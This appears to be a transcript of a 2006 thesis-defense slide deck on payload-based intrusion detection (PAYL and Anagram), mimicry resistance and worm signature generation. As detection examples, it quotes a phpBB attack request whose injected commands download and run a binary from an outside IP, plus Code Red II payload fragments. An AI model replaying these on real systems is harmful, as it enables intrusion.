Network Payload-based Anomaly Detection and Content-based Alert Correlation

Ke Wang. Thesis Defense, Aug. 14th, 2006. Department of Computer Science, Columbia University.

Why do we need payload-based anomaly detection?
- Attacks carried over otherwise normal connections may contain bad (anomalous) content indicative of a new exploit
- Slow and stealthy, or targeted/hitlist, worms do not display “loud and obvious” scanning or propagation behavior detectable via flow statistics
- This sensor augments other sensors and enriches the view of the network

Conjecture and Goal
- Detect zero-day exploits via content analysis
  - A true zero-day will manifest as “never before seen data” delivered to an application or server
  - Learn “typical/normal” data, detect abnormal data
  - Generate a signature immediately to stop further propagation
    - Worms: propagation detectable via flow statistics (except perhaps slow worms)
    - Targeted attacks (sophisticated, stealthy, no “loud and obvious” propagation)
    - No need to wait until “payload prevalence” (a sufficient number of repeated occurrences of the same content)
- Develop sensors that are accurate, efficient, scalable, with resiliency to mimicry attacks



Contributions
- Demonstrate the usefulness of analyzing network payload for anomaly detection
  - PAYL: 1-gram modeling
  - Anagram: higher-order n-gram modeling
- Randomized modeling/testing that can help thwart mimicry attacks
- Ingress/egress payload correlation to capture a worm’s initial propagation attempt
- Efficient privacy-preserving payload correlation across sites, and automatic signature generation

Contributions
- Demonstrate the usefulness of analyzing network payload for anomaly detection
  - PAYL: 1-gram modeling
    - Statistical, semantics/language-independent, efficient
    - Incremental learning
    - Clustering for space saving
    - Multi-centroid fine-grained modeling
  - Anagram: higher-order n-gram modeling
- Randomized modeling/testing that can help thwart mimicry attacks
- Ingress/egress payload correlation to capture a worm’s initial propagation attempt
- Efficient privacy-preserving payload correlation across sites

Motivation of PAYL
- Content traffic to different ports has very different payload distributions
- Within one port, packets with different lengths also have different payload distributions
- Furthermore, worm/virus payloads are usually quite different from normal distributions
- Previous work:
  - Attack signatures: Snort, Bro
  - First few bytes of a packet: NATE, PHAD, ALAD
  - Service-specific IDS [CKrugel 02]: coarse modeling, 256 ASCII characters in 6 groups

Example byte distributions for different ports (panels: ssh, Mail, Web)

Example byte distribution for different payload lengths of port 80 on the same host server

CR II distribution versus a normal distribution



How to model “normal” content: 1-gram centroid
The average relative frequency of each byte, and the standard deviation of the frequency of each byte, for payload length 185 of port 80
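The centroid described above can be sketched as follows. This is a minimal illustration, not the PAYL implementation: the function names are hypothetical, payloads are assumed non-empty, and the population standard deviation is an assumption.

```python
from collections import Counter
from math import sqrt


def byte_frequencies(payload: bytes) -> list[float]:
    """Relative frequency of each of the 256 byte values in one payload.

    Assumes a non-empty payload (illustrative helper, not from the slides).
    """
    counts = Counter(payload)
    total = len(payload)
    return [counts.get(b, 0) / total for b in range(256)]


def build_centroid(payloads: list[bytes]) -> tuple[list[float], list[float]]:
    """Per-byte mean and (population) standard deviation of relative frequency."""
    freqs = [byte_frequencies(p) for p in payloads]
    n = len(freqs)
    mean = [sum(f[b] for f in freqs) / n for b in range(256)]
    std = [sqrt(sum((f[b] - mean[b]) ** 2 for f in freqs) / n) for b in range(256)]
    return mean, std


mean, std = build_centroid([b"aa", b"ab"])
```

In PAYL one such centroid would be kept per port and payload length; batching all payloads in memory here is only for readability.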

PAYL operation
- Learning phase
  - Models are computed from the packet stream incrementally, conditioned on port/service and length of packet
  - Hands-free epoch-based training
  - Fine-grained multi-centroid modeling
  - Clustering: merge two neighbouring centroids if their Manhattan distance is smaller than a threshold
    - Saves space, removes redundancy, linear-time computation
    - Improves the modeling accuracy for those length bins with little training data (sparseness)
- Self-calibration phase
  - Sampled training data sets an initial threshold setting
- Detection phase
  - Packets are compared against models using the simplified Mahalanobis distance



Performance comparison: single centroid vs. multi-centroids
Test worms: CR, CRII, WebDAV, and nsiislog.dll buffer overflow vulnerability (MS03-022)

| Model | Dataset W | Dataset W1 | Dataset EX |
|---|---|---|---|
| Single-centroid | 0.66% | 0.487% | 0.982% |
| Multi-centroids (one-pass) | 0.42% | 0.225% | 0.32% |
| Multi-centroids (semi-batched) | 0.0086% | 0.029% | 0.107% |

At 0.1% false positive rate: 5.8 alerts/h for EX, 6 alerts/h for W, 8 alerts/h for W1

PAYL Summary
- Models: length-conditioned character frequency distribution (1-gram) and standard deviation of normal traffic
- Testing: Mahalanobis distance of the test packet against the model
- Pro:
  - Simple, fast, memory efficient
- Con:
  - Cannot capture attacks displaying a normal byte distribution
  - Easily fooled by mimicry attacks with proper padding

Example: phpBB forum attack

GET /modules/Forums/admin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|..HTTP/1.1.Host:.128.59.16.26.User-Agent:.Mozilla/4.0.(compatible;.MSIE.6.0;.Windows.NT.5.1;)..

- Relatively normal byte distribution, so PAYL misses it
- Abnormal sequence of commands for exploitation
  - The attack invariants
- The subsequence of new, distinct byte values should be “malicious”
- What we need: capture order dependence of byte sequences, i.e. higher-order n-gram modeling

Contributions
- Demonstrate the usefulness of analyzing network payload for anomaly detection
  - PAYL: 1-gram modeling
  - Anagram: higher-order n-gram modeling
    - Binary-based modeling
    - Bloom filter for space efficiency
    - Semi-supervised learning
    - Privacy-preserving payload alert for correlation
- Randomized modeling/testing that can help thwart mimicry attacks
- Ingress/egress payload correlation to capture a worm’s initial propagation attempt
- Efficient privacy-preserving payload correlation across sites



Overview of Anagram
- Binary-based higher-order n-gram modeling
  - Models all the distinct n-grams appearing in the normal training data
  - During test, compute the percentage of never-seen distinct n-grams out of the total n-grams in a packet
- Semi-supervised learning
  - Normal traffic is modeled
  - Prior known malicious traffic is modeled: Snort rules, captured malcode
- Model is space-efficient by using Bloom filters
- Previous work
  - Foreign system call sequences [Forrest 96]
  - Trie-based n-gram storage and comparison for network anomaly detection [Rieck 06]
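The binary-based test can be sketched as below, using a plain Python `set` in place of the Bloom filter. The names `ngrams`, `train`, and `score` are hypothetical, and counting every unseen n-gram occurrence (rather than each distinct one once) is an assumption about how the ratio is formed.

```python
def ngrams(data: bytes, n: int) -> list[bytes]:
    """All overlapping n-grams of a payload, in order."""
    return [data[i:i + n] for i in range(len(data) - n + 1)]


def train(model: set, payload: bytes, n: int = 5) -> None:
    """Record every distinct n-gram seen in normal traffic."""
    model.update(ngrams(payload, n))


def score(model: set, payload: bytes, n: int = 5) -> float:
    """Fraction of the packet's n-grams never seen in training."""
    grams = ngrams(payload, n)
    if not grams:
        return 0.0  # payload shorter than n: nothing to score
    unseen = sum(1 for g in grams if g not in model)
    return unseen / len(grams)


model: set = set()
train(model, b"abcdef", n=3)
suspicious = score(model, b"abcxyz", n=3)  # three of the four 3-grams are new
```

A packet would be flagged when its score exceeds a threshold chosen during calibration; the threshold itself is not specified on this slide.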




False positive rate (with 100% detection rate) with different training time and n of n-grams
Normal traffic: real web traffic collected from two CUCS web servers
Test worms: CR, CRII, WebDAV, Mirela, phpBB forum attack, nsiislog.dll buffer overflow (MS03-022)
- Low false positive rate per packet (better per flow)
- No significant gain after 4 days’ training
- Higher-order n-grams need longer training time to build a good model
- 3-grams are not long enough to distinguish malicious byte sequences from normal ones

The false positive rate (with 100% detection rate) for different n-grams, under both normal and semi-supervised training (per-packet rate)



Mimicry attacks
- Attackers can mimic the normal traffic and hide the exploit inside “the sled” to evade the sensor easily.
- Example: the polymorphic mimicry worm developed by [OK 05] targeting PAYL, which uses encoding and traffic blending to simulate a normal profile.

Contributions
- Demonstrate the usefulness of analyzing network payload for anomaly detection
- Randomized modeling/testing that can help thwart mimicry attacks
- Ingress/egress payload correlation to capture a worm’s initial propagation attempt
- Efficient privacy-preserving payload correlation across sites

Randomization against mimicry attacks
- The general idea of payload-based mimicry attacks is to craft small pieces of exploit code with a large amount of “normal” padding to make the whole packet look normal.
- If we randomly choose the payload portion for modeling/testing, the attacker would not know precisely which byte positions it may have to pad to appear normal, so it is harder to hide the exploit code!
- This is a general technique that can be used for both PAYL and Anagram, or any other payload anomaly detector.
- For Anagram, additional randomization: keep the n-gram size a secret!



Randomized Modeling
- Separate the whole packet randomly into several (possibly interleaved) substrings or subsequences S1, S2, ..., SN, and build one model for each of them
- The test packet’s payload is divided accordingly

Shortcomings:
- Models from sub-partitions may be similar
  - Higher memory consumption, no real model diversity
- The testing partitioning needs to be the same as the training partitioning
  - Less flexibility
  - Need to retrain whenever the partitions change

Figure: the top plot is the model built from the whole packet, and the bottom two are the models built from two random sub-partitions.

Randomized Testing
- Simpler strategy that does not incur substantial overhead
- Build one model for the whole packet, randomize the tested portions
- Separate the whole packet randomly into several (possibly interleaved) partitions S1, S2, ..., SN
- Score each randomly chosen partition separately
- Use the maximum score
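A hedged sketch of randomized testing with a chunked random mask follows. The chunk size, the number of partitions, the `seed` parameter, and the `score_fn` callback are all illustrative assumptions; concatenating a partition's chunks before scoring suits a 1-gram detector, whereas an n-gram detector would need a chunk-aware scorer.

```python
import random
from typing import Callable


def random_partitions(payload: bytes, num_parts: int, chunk: int,
                      rng: random.Random) -> list[bytes]:
    """Assign each fixed-size chunk of the payload to a random partition."""
    parts = [bytearray() for _ in range(num_parts)]
    for start in range(0, len(payload), chunk):
        parts[rng.randrange(num_parts)] += payload[start:start + chunk]
    return [bytes(p) for p in parts if p]  # drop partitions that received nothing


def randomized_score(payload: bytes, score_fn: Callable[[bytes], float],
                     num_parts: int = 3, chunk: int = 8, seed=None) -> float:
    """Score every partition separately and report the maximum."""
    rng = random.Random(seed)  # in deployment the mask would be kept secret
    parts = random_partitions(payload, num_parts, chunk, rng)
    return max((score_fn(p) for p in parts), default=0.0)


# Toy detector (assumption): fraction of 0x90 bytes in the tested portion.
nop_ratio = lambda p: p.count(b"\x90") / len(p)
padded = b"A" * 64 + b"\x90" * 8
result = randomized_score(padded, nop_ratio, seed=1)
```

Because the suspicious chunk lands in a partition with only part of the padding, the maximum partition score is never lower than the whole-packet score for this kind of ratio-based detector.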


![PAYL test on the OK 05 mimicry attack, 20-fold randomized testing](http://slidetodoc.com/presentation_image_h/37c49f1a1af9d614d34fcd360e08a4b3/image-28.jpg)

PAYL test on the mimicry attack designed by [OK 05] targeting it, 20-fold randomized testing
- Detection times: pure random mask 16/20; chunked random mask 14/20
- Avg. FP, Std. FP: 0.269%, 0.375%, 0.175%, 0.409%

Anagram test: average false positive rate and standard deviation with 100% detection rate, chunked random mask, 10-fold randomized testing (panels: normal training, semi-supervised training)

Contributions
- Demonstrate the usefulness of analyzing network payload for anomaly detection
- Randomized modeling/testing that can help thwart mimicry attacks
- Ingress/egress payload correlation to capture a worm’s initial propagation attempt
  - Detect slow or stealthy worms
  - Immediate signature generation
- Efficient privacy-preserving payload correlation across sites



Ingress/egress correlation to detect a worm’s propagation
- Observation
  - Self-propagating worms will start attacking other machines (by sending at least the exploit portion of their content) shortly after a host is infected
  - The attacked destination port will be the same, since the worm is exploiting the same vulnerability
- An approach to stop the worm’s very first propagation attempt
  - If we detect anomalous egress packets to port i very similar to those anomalous ingress packets to port i, there is a high probability that a worm has started its propagation
- Advantage:
  - Can detect slow or stealthy worms, which won’t show probe behavior and thus avoid probe detectors



Similarity metrics to compare the payloads of two or more anomalous packet alerts

| Metric | Data used | Handle fragment | Detect metamorphic | Similarity score [0, 1] |
|---|---|---|---|---|
| String equality (SE) | Raw data | No | No | 1 for equal, 0 otherwise |
| Longest common substring (LCS) | Raw data | Yes | No | 2*C/(L1+L2) |
| Longest common subsequence (LCSeq) | Raw data | Yes | Some | 2*C/(L1+L2) |
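The LCS and LCSeq scores can be sketched with textbook dynamic programming. This assumes C is the length of the common substring or subsequence and L1, L2 are the lengths of the two payloads, which the slide does not spell out; the function names are hypothetical.

```python
def lcs_substring_len(a: bytes, b: bytes) -> int:
    """Length of the longest common contiguous substring."""
    best = 0
    prev = [0] * (len(b) + 1)
    for i in range(1, len(a) + 1):
        cur = [0] * (len(b) + 1)
        for j in range(1, len(b) + 1):
            if a[i - 1] == b[j - 1]:
                cur[j] = prev[j - 1] + 1
                best = max(best, cur[j])
        prev = cur
    return best


def lcs_subsequence_len(a: bytes, b: bytes) -> int:
    """Length of the longest common (not necessarily contiguous) subsequence."""
    prev = [0] * (len(b) + 1)
    for i in range(1, len(a) + 1):
        cur = [0] * (len(b) + 1)
        for j in range(1, len(b) + 1):
            if a[i - 1] == b[j - 1]:
                cur[j] = prev[j - 1] + 1
            else:
                cur[j] = max(prev[j], cur[j - 1])
        prev = cur
    return prev[len(b)]


def similarity(common_len: int, len_a: int, len_b: int) -> float:
    """Score in [0, 1]: 2*C / (L1 + L2)."""
    total = len_a + len_b
    return 2 * common_len / total if total else 0.0


ingress, egress = b"abcdef", b"zzcdezz"
s = similarity(lcs_substring_len(ingress, egress), len(ingress), len(egress))
```

Both routines are quadratic in the payload lengths, which is acceptable here because only packets that already raised anomaly alerts are compared.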

LCS signature generation: Code Red II |d 0|$@|0 ff|5|d 0|$@|0|h|d 0| @|0|j|1|j|0|U|ff| 5|d 8|$@|0 e 8 19 0 0 0 c 3 ff|%`0@|0 ff|%d 0@|0 ff|%h 0@|0 ff|%p 0@|0 ff|%t 0@|0 ff|%x 0@|0 ff|%| 0@|fc fc fc fc fc 0 0 0 0|EXP LORER. EXE|0 0 0|SOFTWAREMicrosoftWindows NT Current. VersionWinlogon|0 0 0|SFCDisable|0 0 9 d ff ff ff|SYSTEMCurrent. Control. SetService sW 3 SVCParametersVirtual Roots|0 0 0 0|/Scr ipts|0 0 0 0|/MSADC|0 0|/D|0 0|c: , , 21 7|0 0 0 0|d: , , 217|fc fc fc fc fc fc … 33

Previous Work
- Worm signature generation: Autograph, Earlybird, Honeycomb, Polygraph, Hamsa
  - Detect frequently occurring payload substrings or tokens from suspicious IPs, which still depends on the scanning behavior
  - Detection occurs some time after the worm propagation
  - Cannot detect slow and stealthy worms

Contributions
- Demonstrate the usefulness of analyzing network payload for anomaly detection
- Randomized modeling/testing that can help thwart mimicry attacks
- Ingress/egress payload correlation to capture a worm’s initial propagation attempt
- Efficient privacy-preserving payload correlation across sites
  - Robust and privacy-preserving means of representing content-based alerts
  - Automatic signature generation



Cross-site payload alert correlation
- Each site has a distinct content flow
- Find global, common “invariants in content”
  - If multiple sites see the same/similar content alerts, it’s highly likely to be a true worm/targeted outbreak
  - Separate TPs from FPs!
- The false positive problem
  - Reduces false positives by creating white lists of those alerts that cannot be correlated
- Higher standard to prevent mimicry attacks
  - Diversity via content (not system or software)
  - Exploit writers/attackers have to learn the distinct content traffic patterns of many different sites
- Needs to be privacy-preserving

Related Research
- DNAD/Worminator (slow/IP) sharing
- Domino alert sharing
- The DShield.org model for content sharing and querying
  - Could also serve as a “trap” to detect attacker watermarking behavior
- PeerPressure, privacy-preserving friends troubleshooting network



Correlation techniques
- Baseline
  - “Raw” suspect content string-based correlation: string equality (SE), longest common substring (LCS), longest common subsequence (LCSeq), edit distance (ED)
- Frequency-modeled 1-gram correlation
  - Frequency distribution: Manhattan distance
  - Z-String: supports SE, LCSeq, ED
- Binary-modeled n-gram correlation
  - N-gram signature, Bloom filter n-gram “signature”



Example suspect content

Original content (256 bits):

    This is a bot command string

List of 3-grams in the original string. A box represents a space; the underlined n-gram appears twice in the original alert. 25 n-grams take approximately 600 bits.

    Thi, s□a, ot□, mma, □st, his, □a□, t□c, man, str, is□, a□b, □co, and, tri, s□i, □bo, com, nd□, rin, □is, bot, omm, d□s, ing

Frequency distribution (figure); the most frequent character is a space (ASCII code 32). Size ≈ 8160 bits.

Z-String; the space (box) is the most frequent character. Non-appearing characters are removed. 15 characters = 120 bits.

    □isamnotTbcdghr

Bloom filter of the above n-grams. If three hash values are used, a minimum optimal size would b…

    000001101010110100110101101010…0101001110101111000
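The 3-gram list and the Z-String of this example can be reproduced with a few lines. Breaking frequency ties by ascending character code is an assumption (the slide does not state a rule), though it happens to reproduce the Z-String shown; the function names are hypothetical.

```python
from collections import Counter


def distinct_ngrams(text: str, n: int) -> set[str]:
    """Set of distinct n-grams in the alert content."""
    return {text[i:i + n] for i in range(len(text) - n + 1)}


def z_string(text: str) -> str:
    """Characters ordered from most to least frequent; absent characters dropped.

    Ties are broken by ascending character code (an assumption).
    """
    counts = Counter(text)
    return "".join(sorted(counts, key=lambda ch: (-counts[ch], ch)))


alert = "This is a bot command string"
grams = distinct_ngrams(alert, 3)   # 25 distinct 3-grams ("is " occurs twice)
zs = z_string(alert)                # " isamnotTbcdghr", space first
```

The Z-String keeps only the rank order of characters, which is why it is far smaller than the full 256-entry frequency distribution.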



Real traffic evaluation
- Goal: measure performance in identifying true alerts from false positives
  - Ideal: true positives have very high similarity scores, while false positives have very low scores
- Mix the collection of attacks into two hours of traffic from www and www1
  - Multiple, differently-fragmented instances of Code Red and Code Red II to simulate a real worm attack
- Mixed sets are run through PAYL and Anagram, with the alerting threshold reduced so that 100% of attacks are detected, but with possibly higher FP rates

Real traffic evaluation (II)
- Range of scores across multiple instances of the same worm (CR or CRII)
- Range of scores across instances of different worms (CR vs. CRII), e.g., polymorphism
- False positive score range; the blue bar represents the 99.9th percentile; white represents the maximum score
- Methods are, from 1 to 8: Raw-LCS, Raw-LCSeq, Raw-ED, Freq-MD, ZStr-LCS, ZStr-LCSeq, ZStr-ED, N-grams with n=5

Real traffic evaluation (III)
- Correlation of identical (non-polymorphic) attacks works accurately for all techniques
  - Non-fragmented attacks score near 1
  - Z-Strings (MD, LCSeq, ED) and n-grams handle fragmentation well
- Polymorphism is hard to detect; only Raw-LCSeq and n-grams score well
- Overall, n-grams are particularly effective at eliminating false positives, and Bloom filters enable privacy preservation



Signature Generation
- Each class of techniques can generate its own signature
- Raw packets: exchange LCS/LCSeq
  - Not privacy-preserving
- Byte frequency/Z-Strings
  - Given the frequency distribution, Z-Strings are generated by ordering from most to least frequent and dropping the least frequent
- N-grams
  - Robust to reordering or fragmentation
  - If position information is available, can “flatten” into a deployable string signature

Signature/Query generation (II)

Original CRII packet (first 300 bytes):

    GET./default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u0

Z-String (first 20 bytes, ASCII values):

    88 0 255 117 48 85 116 101 106 232 100 133 80 254 1 69 137 56 51

Byte frequency distribution (figure)

Flattened 5-grams (first 172 bytes; “*” implies wi…):

    * /def*ult.ida?XXXX*XXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HT*: 3379

Accuracy of the signatures
The cumulative frequency of the signature match scores computed by matching normal traffic against different worm signatures. The closer to the y-axis, the more accurate. The six curves represent the following, in order from left to right: 1) n-grams signature, 2) Z-string signature compared using LCS, 3) LCSeq of raw signature, 4) Z-string signature using LCSeq, 5) LCSeq of raw signature, 6) byte-frequency signature.

Signature for polymorphic worm
- Our approaches work poorly since they are based on payload similarity
- Will there be enough invariants for an accurate signature?
  - Slammer: first byte “0x04”
  - CLET shellcode 2: “\xff\xff” and “\xeb\x31”
- Proposed alternative: a “generalized signature” specifying the higher-level pattern of an attack, instead of one based on the raw payload
  - “0xeb 0x31”B {92 bytes, entropy: E, “0xff”B}

Conclusions
- Network payload-based PAYL and Anagram can detect zero-day attacks with high accuracy and low false positives
- Randomization helps thwart mimicry attacks
- Ingress/egress correlation detects a worm’s initial propagation and generates accurate worm signatures
  - Good at detecting slow/stealthy worms
- Privacy-preserving payload alert correlation across sites can identify true anomalies and reduce false positives
  - Accurate signature generation

Accomplishments
- Major papers:
  - Anagram: A Content Anomaly Detector Resistant to Mimicry Attack, K. Wang, J. Parekh, S. Stolfo, RAID, Sept. 2006.
  - Privacy-preserving Payload-based Correlation for Accurate Malicious Traffic Detection, J. Parekh, K. Wang, S. Stolfo, SIGCOMM LSAD Workshop, Sept. 2006.
  - Anomalous Payload-based Worm Detection and Signature Generation, K. Wang, G. Cretu, S. Stolfo, RAID, Sept. 2005.
  - FLIPS: Hybrid Adaptive Intrusion Prevention, M. Locasto, K. Wang, A. Keromytis, S. Stolfo, RAID, Sept. 2005.
  - Anomalous Payload-based Network Intrusion Detection, K. Wang, S. Stolfo, RAID, Sept. 2004.
- Software implementation (licensed by Columbia):
  - PAYL sensor
  - Anagram sensor

Future Work
- Further evaluation, including measures/features of high-entropy partitions
- Optimization problem: model parameter settings (n-gram size, thresholds, etc.), random mask generation
- Real deployment of multiple-site correlation
- Shadow server architecture implementation and testing
- Pushing into the host: integration with instrumented application software

Thank you! Q/A?

Backup slides

Overview of PAYL: how it works
- Principles of operation
  - Fine-grained modeling of normal payload
    - Normal packet content is automatically learned
    - Based upon unsupervised anomaly detection algorithms
    - Site and application specific, also conditioned on packet length
  - Build the byte frequency distribution and its standard deviation as the normal profile
  - For test data, compute the simplified Mahalanobis distance against its centroid to measure similarity

Unsupervised Anomaly Detection: Core Technology
- Each site/host has a “unique” content flow that may be automatically learned
- UAD generates a model over “unlabeled” data
- Model detects
  - Anomalies in collected training data (forensics)
  - Anomalies in the data stream (detection)
- Computational approach: outlier detection
  - Two frameworks: geometric, probabilistic/statistical
  - Several algorithms; PAYL is based upon comparison of content statistical distributions
- Handles “noise” in data
  - No guarantees of “attack-free” data
  - Assumes most data is “attack-free”



Epoch-based learning
- Purpose: to determine how much training data is enough, or whether the model is ready for use
- An epoch is measured in terms of the number of packets analyzed, or by means of a time period
- The training phase is sufficiently complete if the currently computed model has changed little for several consecutive epochs
- Need to define model similarity measurements

Epoch-based learning: PAYL
- Metric 1: number of new centroids produced in the current epoch
- Metric 2: Manhattan distance of each centroid to its nearest one computed in the prior epoch

Epoch-based learning: Anagram
The likelihood of seeing new n-grams, which is the percentage of new distinct n-grams out of the total n-grams in this epoch
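The per-epoch stability measure can be sketched as below. How epochs are delimited and what counts as “changed little” are left open by the slides, so the input shape (a list of packet lists) and the function name are assumptions.

```python
def new_ngram_rates(epochs: list[list[bytes]], n: int = 5) -> list[float]:
    """For each epoch, the fraction of n-grams that were never seen before.

    `epochs` is a list of epochs, each a list of packet payloads
    (hypothetical input shape for illustration).
    """
    seen: set[bytes] = set()
    rates = []
    for packets in epochs:
        total = new = 0
        for payload in packets:
            for i in range(len(payload) - n + 1):
                gram = payload[i:i + n]
                total += 1
                if gram not in seen:
                    seen.add(gram)  # a new distinct n-gram is counted once
                    new += 1
        rates.append(new / total if total else 0.0)
    return rates


rates = new_ngram_rates([[b"abcdef"], [b"abcdef"], [b"abcxyz"]], n=3)
```

Training could be declared sufficient once the rate stays below a small value for several consecutive epochs; that cutoff would need to be chosen empirically.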

The computed Mahalanobis distance of the normal and attack packets
The normal data’s distances are displayed as several bands, which illustrates that we might have multiple centroids for one length



Multiple centroids modeling for each length
- Goal: build finer-grained models for the payload to detect anomalies more accurately
- Problems:
  - Don’t know how many clusters may exist
  - Can only access each packet’s data once, in sequence; cannot store all packets in memory
  - So traditional clustering algorithms like K-means and EM cannot be easily applied here
- Our solution
  - One-pass online clustering
  - Improvement: semi-batched one-pass clustering (keep a small buffer and do locally optimal clustering)



Simplified Mahalanobis Distance
- Standard metric to compare two statistical distributions, where x is the test data and y is its profile.
- When we assume each ASCII value is independent, the formula can be simplified.
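The two formulas on this slide were images and did not survive extraction. As a hedged restatement: the first line below is the standard Mahalanobis distance with covariance matrix $C$, and the second is the simplified per-byte form as it appears in the published PAYL paper. The smoothing factor $\alpha$, which avoids division by zero, comes from that paper and is not mentioned on this slide.

```latex
% Full Mahalanobis distance between test vector x and profile mean \bar{y};
% C is the covariance matrix of the profile.
d^{2}(x, \bar{y}) = (x - \bar{y})^{T} \, C^{-1} \, (x - \bar{y})

% Simplified form under the independence assumption (n = 256 byte values);
% \bar{\sigma}_i is the per-byte standard deviation, \alpha a smoothing factor.
d(x, \bar{y}) = \sum_{i=0}^{n-1} \frac{|x_i - \bar{y}_i|}{\bar{\sigma}_i + \alpha}
```

The simplified form replaces the matrix inversion with a single pass over the 256 byte frequencies, which is what makes per-packet testing cheap.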



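Incremental Learning
- Average of N data: $\bar{x} = \frac{1}{N}\sum_{i=1}^{N} x_i$
- When the (N+1)th data arrives: $\bar{x}_{new} = \frac{N\bar{x} + x_{N+1}}{N+1} = \bar{x} + \frac{x_{N+1} - \bar{x}}{N+1}$
- For the standard deviation, we can rewrite the variance as: $Var(X) = E(X - EX)^2 = E(X^2) - (EX)^2$
- Therefore, we don’t need to keep previous data to update the average and standard deviation
- Each centroid now stores only the average of x and the average of x²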
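A minimal sketch of the incremental update for a single byte value follows. The class name and fields are hypothetical; it keeps only the count, the running average of x, and the running average of x², as the slide describes.

```python
from math import sqrt


class RunningStat:
    """Running mean and standard deviation without storing past samples."""

    def __init__(self) -> None:
        self.n = 0
        self.mean_x = 0.0    # running average of x
        self.mean_x2 = 0.0   # running average of x squared

    def update(self, x: float) -> None:
        self.n += 1
        self.mean_x += (x - self.mean_x) / self.n
        self.mean_x2 += (x * x - self.mean_x2) / self.n

    @property
    def std(self) -> float:
        # Var(X) = E(X^2) - (E X)^2; clamp tiny negatives from rounding
        return sqrt(max(self.mean_x2 - self.mean_x ** 2, 0.0))


stat = RunningStat()
for value in [2, 4, 4, 4, 5, 5, 7, 9]:
    stat.update(value)
```

A PAYL-style centroid would hold 256 such pairs of averages, one per byte value, for each port and payload length.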

Manhattan distance (figure: distance between two distributions x and y)



Example of clustering across length bins (panels: original centroids, clustered centroids)



Self-calibration
- Training data is sampled
- Use a FIFO to keep the most recent samples to capture concept drift
- After training, compute the distances of the samples against the centroid and set the anomaly threshold to the maximum
- At the start of the detection phase, increase the threshold by t% if the alert rate is higher than a user-specified parameter



One-pass online clustering algorithm

    while (more packets) {
        p = next packet;
        if (p is similar to one of the existing centroids)
            merge into that centroid
        else
            create a new centroid; use p as center
        if (total number of centroids > MaxSize)
            merge the two nearest ones
    }

Problem: the incoming order of the packets affects the result
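The pseudocode above can be sketched in runnable form as follows. Several details are assumptions: “similar” is taken to mean a Manhattan distance below a threshold to the nearest centroid, a centroid is reduced to a (count, mean vector) pair with no standard deviation, and merging is a count-weighted average.

```python
def manhattan(x, y):
    """Manhattan (L1) distance between two equal-length vectors."""
    return sum(abs(a - b) for a, b in zip(x, y))


def merge(c1, c2):
    """Count-weighted average of two (count, mean) centroids."""
    (n1, m1), (n2, m2) = c1, c2
    n = n1 + n2
    return n, [(n1 * a + n2 * b) / n for a, b in zip(m1, m2)]


def one_pass_cluster(vectors, threshold, max_size):
    """Cluster a stream of vectors, visiting each exactly once."""
    centroids = []  # list of (count, mean) pairs
    for v in vectors:
        nearest = min(range(len(centroids)),
                      key=lambda i: manhattan(centroids[i][1], v),
                      default=None)
        if nearest is not None and manhattan(centroids[nearest][1], v) < threshold:
            centroids[nearest] = merge(centroids[nearest], (1, list(v)))
            continue
        centroids.append((1, list(v)))
        if len(centroids) > max_size:
            # Too many centroids: merge the two nearest ones.
            i, j = min(
                ((a, b) for a in range(len(centroids))
                 for b in range(a + 1, len(centroids))),
                key=lambda p: manhattan(centroids[p[0]][1], centroids[p[1]][1]),
            )
            centroids[i] = merge(centroids[i], centroids[j])
            del centroids[j]
    return centroids


clusters = one_pass_cluster([[0.0], [10.0], [11.0]], threshold=0.5, max_size=2)
```

Feeding the same vectors in a different order can yield different centroids, which is the ordering problem the slide notes.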



Continue …

    merge (c_set1, c_set2) {
        for (each c in c_set1) {
            if (c is similar to one of the centroids in c_set2)
                merge c into that centroid
            else
                add c as a new centroid to c_set2
        }
        if (size of c_set2 > MaxNum)
            merge the two nearest ones until (size == MaxNum)
    }



Improvement: Semi-batched one-pass clustering for stream processing
- Main idea:
  - Store byte distributions of M packets
  - Optimize aggregate clustering of the M packets
  - Merge the resulting centroids into the existing centroids from the prior batch of data
- Can ameliorate the problem of packet ordering
- The batch size M needs to be chosen properly: a tradeoff between accuracy and memory consumption





One-pass clustering result. First six centroids for W dataset, length 1460

Semi-batch clustering result. First six centroids for W dataset, length 1460

Performance
- Training over 3 days of data, detection over 2 days
- Data from two web servers
- Training: 29 seconds (60 MBits/sec)
- Detection: 12 seconds (54 MBits/sec)
- FP rate: 42 / 625595 packets (0.006%)
- Coverage: 20/30 known attacks in data detected



Bloom filter
- A Bloom filter (BF) is a one-way data structure that supports insert and verify operations, yet is fast and space-efficient
- Represented as a bit vector; bit b is set if h_i(e) = b, where h_i is a hash function and e is the element in question
- No false negatives, although false positives are possible in a saturated BF via hash collisions; use multiple hash functions for robustness
- Each n-gram is a candidate element to be inserted or verified in the BF
- Bloom filters are also privacy-preserving, since n-grams cannot be extracted from the resulting bit vector
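A minimal Bloom filter sketch for n-grams is shown below. Deriving the k hash functions from SHA-256 with a one-byte prefix is an illustrative choice, not necessarily what Anagram uses, and the filter size is arbitrary.

```python
import hashlib


class BloomFilter:
    """Bit-vector set membership with no false negatives."""

    def __init__(self, num_bits: int, num_hashes: int = 3) -> None:
        self.num_bits = num_bits
        self.num_hashes = num_hashes  # must be at most 256 with this prefix scheme
        self.bits = bytearray((num_bits + 7) // 8)

    def _positions(self, item: bytes):
        # Hash i is SHA-256 of a one-byte index prefix plus the item (assumption).
        for i in range(self.num_hashes):
            digest = hashlib.sha256(bytes([i]) + item).digest()
            yield int.from_bytes(digest[:8], "big") % self.num_bits

    def insert(self, item: bytes) -> None:
        for pos in self._positions(item):
            self.bits[pos // 8] |= 1 << (pos % 8)

    def __contains__(self, item: bytes) -> bool:
        return all(self.bits[pos // 8] & (1 << (pos % 8))
                   for pos in self._positions(item))


bf = BloomFilter(1 << 16)
payload = b"GET /index.html HTTP/1.1"
for i in range(len(payload) - 4):
    bf.insert(payload[i:i + 5])      # insert every 5-gram
seen = payload[:5] in bf             # always True for inserted items
```

Only the bit vector needs to be shared for correlation; recovering the inserted n-grams from it would require inverting the hash functions.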




Anagram: semi-supervised learning
- The binary-based approach is simple and efficient, but too sensitive to noisy data
